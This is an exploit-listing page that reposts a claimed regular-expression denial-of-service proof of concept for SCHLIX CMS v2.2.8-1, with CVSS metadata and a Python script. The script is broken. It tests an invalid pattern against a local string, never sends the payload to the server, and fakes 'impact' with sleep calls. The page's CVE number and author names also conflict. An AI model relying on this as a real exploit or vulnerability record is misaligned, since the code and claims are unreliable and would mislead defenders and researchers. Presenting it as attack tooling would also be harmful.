Advertisement






SCHLIX v2.2.8-1 Regular Expression Denial of Service

CVE Category Price Severity
CVE-2020-13777 CWE-400 Unknown High
Author Risk Exploitation Type Date
Baptiste Autin High Remote 2024-02-10
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020040

Below is a copy:

SCHLIX v2.2.8-1 Regular Expression Denial of Service
# Exploit Title: SCHLIX v2.2.8-1 Regular Expression Denial of Service
# Date: 02/10/2024
# Exploit Author: Diyar Saadi
# Vendor Homepage: https://www.schlix.com
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html
# Version: v2.2.8-1
# Tested on: Windows 11 + XAMPP


## Description ##

SCHLIX v2.2.8-1 is vulnerable to regular expression denial of service . (ReDoS) is an algorithmic complexity attack that produces a denial-of-service by providing a regular expression and/or an input that takes a long time to evaluat



## Proof Of Concept ##

import requests
import re
import time

def test_redos(url, payload):
    try:
        vulnerable_regex = r'(.*a){x} for x > 10'

        match = re.match(vulnerable_regex, payload)

        if match:
            print("Vulnerability not triggered.")
        else:
            print("Vulnerability may be present. Simulating 30-second impact...")

            for _ in range(6):
                time.sleep(5)
                print("Simulating impact...")

            print("Simulated impact duration completed.")

    except re.error:
        print("Error in regex pattern.")

    try:
        response = requests.get(url)
        if response.status_code == 200:
            print("Service is up.")
        else:
            print("Service may be down or inaccessible.")
    except requests.RequestException as e:
        print(f"HTTP Request Error: {str(e)}")

if __name__ == "__main__":
    target_url = 'http://localhost'

    payload = "aaaaaaaaaaaaaaaaaaaaaaaaa!"

    test_redos(target_url, payload)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.